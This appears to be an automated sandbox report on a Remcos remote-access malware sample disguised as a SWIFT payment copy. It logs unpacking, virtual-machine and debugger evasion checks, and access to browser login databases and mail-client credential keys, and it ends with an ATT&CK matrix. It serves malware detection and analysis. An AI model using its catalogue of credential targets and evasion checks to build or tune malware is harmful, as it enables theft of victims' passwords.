                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exe Process created: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exe C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exe /stext "C:\Users\user\AppData\Local\Temp\hqupnmxiqgofocirvgzrkof"
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exe Process created: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exe C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exe /stext "C:\Users\user\AppData\Local\Temp\rsiinfhkeogkqiwvmrmsntajnt"
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exe Process created: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exe C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exe /stext "C:\Users\user\AppData\Local\Temp\umntoxsdzwyxawszvchuyguswzwofs"
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exe Section loaded: edgegdi.dll
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exe Section loaded: uxtheme.dll
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exe Section loaded: userenv.dll
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exe Section loaded: apphelp.dll
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exe Section loaded: propsys.dll
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exe Section loaded: dwmapi.dll
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exe Section loaded: cryptbase.dll
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exe Section loaded: oleacc.dll
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exe Section loaded: version.dll
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exe Section loaded: shfolder.dll
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exe Section loaded: kernel.appcore.dll
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exe Section loaded: windows.storage.dll
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exe Section loaded: wldp.dll
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exe Section loaded: msi.dll
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exe Section loaded: iertutil.dll
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exe Section loaded: sspicli.dll
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exe Section loaded: powrprof.dll
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exe Section loaded: winhttp.dll
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exe Section loaded: wkscli.dll
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exe Section loaded: netutils.dll
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exe Section loaded: umpdc.dll
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exe Section loaded: wininet.dll
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exe Section loaded: profapi.dll
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exe Section loaded: ondemandconnroutehelper.dll
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exe Section loaded: mswsock.dll
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exe Section loaded: iphlpapi.dll
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exe Section loaded: winnsi.dll
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exe Section loaded: urlmon.dll
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exe Section loaded: srvcli.dll
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exe Section loaded: dnsapi.dll
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exe Section loaded: rasadhlp.dll
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exe Section loaded: fwpuclnt.dll
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exe Section loaded: schannel.dll
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exe Section loaded: mskeyprotect.dll
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exe Section loaded: ntasn1.dll
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exe Section loaded: msasn1.dll
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exe Section loaded: dpapi.dll
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exe Section loaded: cryptsp.dll
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exe Section loaded: rsaenh.dll
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exe Section loaded: gpapi.dll
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exe Section loaded: ncrypt.dll
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exe Section loaded: ncryptsslp.dll
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exe Section loaded: winmm.dll
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exe Section loaded: pstorec.dll
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exe Section loaded: vaultcli.dll
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exe Section loaded: wintypes.dll
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exe File written: C:\Users\user\AppData\Local\Temp\Setup.ini
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exe File opened: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.cfg
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
                  Source: z58Swiftcopy_MT.bat.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                  Source: Binary string: mshtml.pdb source: z58Swiftcopy_MT.bat.exe, 00000002.00000001.27691456198.0000000000649000.00000020.00000001.01000000.00000007.sdmp
                  Source: Binary string: mshtml.pdbUGP source: z58Swiftcopy_MT.bat.exe, 00000002.00000001.27691456198.0000000000649000.00000020.00000001.01000000.00000007.sdmp

                  Data Obfuscation

                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exe Unpacked PE file: 3.2.z58Swiftcopy_MT.bat.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exe Unpacked PE file: 4.2.z58Swiftcopy_MT.bat.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exe Unpacked PE file: 5.2.z58Swiftcopy_MT.bat.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
                  Source: Yara match File source: 00000002.00000002.32053389316.0000000001764000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match File source: 00000000.00000002.27693286929.00000000031B4000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match File source: 00000000.00000002.27693002963.00000000028A5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match File source: 00000002.00000002.32053389316.0000000001660000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match File source: 00000000.00000002.27693286929.00000000030B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\stvbrernes\Cementfabrikkerne\Objektsprogs.Jrg119, type: DROPPED
                  Source: Yara match File source: C:\Users\user\AppData\Local\Temp\nsm9317.tmp, type: DROPPED
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeCode function: 0_2_10001A5D GlobalAlloc,lstrcpyA,lstrcpyA,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyA,GetModuleHandleA,LoadLibraryA,GetProcAddress,lstrlenA,0_2_10001A5D
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeCode function: 0_2_10002D20 push eax; ret 0_2_10002D4E
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeCode function: 2_2_33A72806 push ecx; ret 2_2_33A72819
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeCode function: 2_2_0176527A push ds; retf 2_2_0176527E
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeCode function: 2_2_0176827A push ds; retf 2_2_0176827E
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeCode function: 3_2_0044693D push ecx; ret 3_2_0044694D
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeCode function: 3_2_0044DB70 push eax; ret 3_2_0044DB84
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeCode function: 3_2_0044DB70 push eax; ret 3_2_0044DBAC
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeCode function: 3_2_00451D54 push eax; ret 3_2_00451D61
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeCode function: 4_2_0044B090 push eax; ret 4_2_0044B0A4
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeCode function: 4_2_0044B090 push eax; ret 4_2_0044B0CC
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeCode function: 4_2_00451D34 push eax; ret 4_2_00451D41
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeCode function: 4_2_00444E71 push ecx; ret 4_2_00444E81
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeCode function: 5_2_00414060 push eax; ret 5_2_00414074
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeCode function: 5_2_00414060 push eax; ret 5_2_0041409C
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeCode function: 5_2_00414039 push ecx; ret 5_2_00414049
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeCode function: 5_2_004164EB push 0000006Ah; retf 5_2_004165C4
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeCode function: 5_2_00416553 push 0000006Ah; retf 5_2_004165C4
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeCode function: 5_2_00416555 push 0000006Ah; retf 5_2_004165C4
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exe File created: C:\Users\user\AppData\Local\Temp\nsb9327.tmp\System.dll
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeCode function: 4_2_004047CB LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,4_2_004047CB
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exe Process information set: NOOPENFILEERRORBOX

                  Malware Analysis System Evasion

                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exe API/Special instruction interceptor: Address: 340E6D4
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exe API/Special instruction interceptor: Address: 19BE6D4
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exe File opened: C:\Program Files\Qemu-ga\qemu-ga.exe
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exe File opened: C:\Program Files\qga\qga.exe
                  Source: z58Swiftcopy_MT.bat.exe, 00000000.00000002.27692448822.00000000006D0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OMC:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE1]?
                  Source: z58Swiftcopy_MT.bat.exe, 00000000.00000002.27692878076.0000000002430000.00000004.00001000.00020000.00000000.sdmp, z58Swiftcopy_MT.bat.exe, 00000002.00000002.32057198140.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: PC:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
                  Source: z58Swiftcopy_MT.bat.exe, 00000000.00000002.27692448822.00000000006D8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXESK
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeCode function: 3_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle,3_2_0040DD85
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exe Window / User API: threadDelayed 3609
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exe Window / User API: threadDelayed 5385
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exe Window / User API: foregroundWindowGot 1764
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsb9327.tmp\System.dll
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exe API coverage: 9.2 %
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exe TID: 7704 Thread sleep count: 3609 > 30
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exe TID: 484 Thread sleep count: 82 > 30
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exe TID: 484 Thread sleep time: -41000s >= -30000s
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exe TID: 1212 Thread sleep count: 5385 > 30
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exe TID: 1212 Thread sleep time: -16155000s >= -30000s
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exe Thread sleep count: Count: 3609 delay: -5
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeCode function: 0_2_00405861 CloseHandle,GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,0_2_00405861
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeCode function: 0_2_0040639C FindFirstFileA,FindClose,0_2_0040639C
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeCode function: 0_2_004026F8 FindFirstFileA,0_2_004026F8
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeCode function: 2_2_33A710F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,2_2_33A710F1
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeCode function: 2_2_33A76580 FindFirstFileExA,2_2_33A76580
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeCode function: 3_2_0040AE51 FindFirstFileW,FindNextFileW,3_2_0040AE51
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeCode function: 4_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,4_2_00407EF8
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeCode function: 5_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,5_2_00407898
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeCode function: 3_2_00418981 memset,GetSystemInfo,3_2_00418981
                  Source: z58Swiftcopy_MT.bat.exe, 00000000.00000002.27696800598.0000000010059000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Guest Shutdown Service
                  Source: z58Swiftcopy_MT.bat.exe, 00000000.00000002.27692448822.00000000006D0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OmC:\Program Files\Qemu-ga\qemu-ga.exe1]?
                  Source: z58Swiftcopy_MT.bat.exe, 00000000.00000002.27696800598.0000000010059000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Remote Desktop Virtualization Service
                  Source: z58Swiftcopy_MT.bat.exe, 00000000.00000002.27696800598.0000000010059000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmicshutdown
                  Source: z58Swiftcopy_MT.bat.exe, 00000000.00000002.27696800598.0000000010059000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Volume Shadow Copy Requestor
                  Source: z58Swiftcopy_MT.bat.exe, 00000002.00000003.29410654098.0000000002A88000.00000004.00000020.00020000.00000000.sdmp, z58Swiftcopy_MT.bat.exe, 00000002.00000002.32056784519.0000000002A88000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW/
                  Source: z58Swiftcopy_MT.bat.exe, 00000000.00000002.27696800598.0000000010059000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V PowerShell Direct Service
                  Source: z58Swiftcopy_MT.bat.exe, 00000000.00000002.27696800598.0000000010059000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Time Synchronization Service
                  Source: z58Swiftcopy_MT.bat.exe, 00000000.00000002.27696800598.0000000010059000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmicvss
                  Source: z58Swiftcopy_MT.bat.exe, 00000002.00000003.29410654098.0000000002A88000.00000004.00000020.00020000.00000000.sdmp, z58Swiftcopy_MT.bat.exe, 00000002.00000002.32056632494.0000000002A4B000.00000004.00000020.00020000.00000000.sdmp, z58Swiftcopy_MT.bat.exe, 00000002.00000002.32056784519.0000000002A88000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                  Source: z58Swiftcopy_MT.bat.exe, 00000000.00000002.27696800598.0000000010059000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Data Exchange Service
                  Source: z58Swiftcopy_MT.bat.exe, 00000000.00000002.27692878076.0000000002430000.00000004.00001000.00020000.00000000.sdmp, z58Swiftcopy_MT.bat.exe, 00000002.00000002.32057198140.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: PC:\Program Files\Qemu-ga\qemu-ga.exe
                  Source: z58Swiftcopy_MT.bat.exe, 00000000.00000002.27696800598.0000000010059000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Heartbeat Service
                  Source: z58Swiftcopy_MT.bat.exe, 00000000.00000002.27692448822.00000000006D8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exesk
                  Source: z58Swiftcopy_MT.bat.exe, 00000000.00000002.27696800598.0000000010059000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Guest Service Interface
                  Source: z58Swiftcopy_MT.bat.exe, 00000000.00000002.27696800598.0000000010059000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmicheartbeat
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exe API call chain: ExitProcess graph end node graph_0-4128
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exe API call chain: ExitProcess graph end node graph_0-4306
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exe API call chain: ExitProcess graph end node graph_4-34116
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exe Process information queried: ProcessInformation
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeCode function: 2_2_33A72639 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_33A72639
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeCode function: 3_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle,3_2_0040DD85
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeCode function: 0_2_10001A5D GlobalAlloc,lstrcpyA,lstrcpyA,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyA,GetModuleHandleA,LoadLibraryA,GetProcAddress,lstrlenA,0_2_10001A5D
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeCode function: 2_2_33A74AB4 mov eax, dword ptr fs:[00000030h]2_2_33A74AB4
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeCode function: 2_2_33A7724E GetProcessHeap,2_2_33A7724E
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exe Process token adjusted: Debug
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeCode function: 2_2_33A72B1C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_33A72B1C
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeCode function: 2_2_33A72639 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_33A72639
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeCode function: 2_2_33A760E2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_33A760E2

                  HIPS / PFW / Operating System Protection Evasion

                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exe Section loaded: NULL target: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exe protection: execute and read and write
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exe Process created: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exe "C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exe"
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exe Process created: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exe C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exe /stext "C:\Users\user\AppData\Local\Temp\hqupnmxiqgofocirvgzrkof"
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exe Process created: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exe C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exe /stext "C:\Users\user\AppData\Local\Temp\rsiinfhkeogkqiwvmrmsntajnt"
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exe Process created: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exe C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exe /stext "C:\Users\user\AppData\Local\Temp\umntoxsdzwyxawszvchuyguswzwofs"
                  Source: z58Swiftcopy_MT.bat.exe, 00000002.00000003.28436040290.0000000002A9A000.00000004.00000020.00020000.00000000.sdmp, z58Swiftcopy_MT.bat.exe, 00000002.00000002.32056932719.0000000002A9D000.00000004.00000020.00020000.00000000.sdmp, z58Swiftcopy_MT.bat.exe, 00000002.00000003.29410654098.0000000002A88000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager
                  Source: z58Swiftcopy_MT.bat.exe, 00000002.00000002.32056632494.0000000002A18000.00000004.00000020.00020000.00000000.sdmp, logs.dat.2.drBinary or memory string: [Program Manager]
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeCode function: 2_2_33A72933 cpuid 2_2_33A72933
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exe Queries volume information: C:\ VolumeInformation
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeCode function: 2_2_33A72264 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,2_2_33A72264
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeCode function: 4_2_004082CD memset,memset,memset,memset,GetComputerNameA,GetUserNameA,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,strlen,strlen,memcpy,4_2_004082CD
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeCode function: 0_2_0040330D EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_0040330D
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                  Stealing of Sensitive Information

                  Source: Yara match File source: Process Memory Space: z58Swiftcopy_MT.bat.exe PID: 5524, type: MEMORYSTR
                  Source: Yara match File source: C:\ProgramData\remcos\logs.dat, type: DROPPED
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\places.sqlite
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\key4.db
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exe Key opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic Salt
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exe Key opened: HKEY_CURRENT_USER\Software\Paltalk
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exe Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exe Code function: ESMTPPassword 4_2_004033F0
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exe Code function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, PopPassword 4_2_00402DB3
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exe Code function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, SMTPPassword 4_2_00402DB3
                  Source: Yara match File source: Process Memory Space: z58Swiftcopy_MT.bat.exe PID: 5524, type: MEMORYSTR
                  Source: Yara match File source: Process Memory Space: z58Swiftcopy_MT.bat.exe PID: 2804, type: MEMORYSTR

                  Remote Access Functionality

                  Source: Yara match | File source: Process Memory Space: z58Swiftcopy_MT.bat.exe PID: 5524, type: MEMORYSTR
                  Source: Yara match | File source: C:\ProgramData\remcos\logs.dat, type: DROPPED
| Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 11 Native API | 1 DLL Side-Loading | 1 DLL Side-Loading | 1 Deobfuscate/Decode Files or Information | 1 OS Credential Dumping | 1 System Time Discovery | Remote Services | 1 Archive Collected Data | 1 Ingress Tool Transfer | Exfiltration Over Other Network Medium | 1 System Shutdown/Reboot |
| Credentials | Domains | Default Accounts | 2 Command and Scripting Interpreter | Boot or Logon Initialization Scripts | 1 Access Token Manipulation | 2 Obfuscated Files or Information | 11 Input Capture | 1 Account Discovery | Remote Desktop Protocol | 1 Data from Local System | 21 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service |
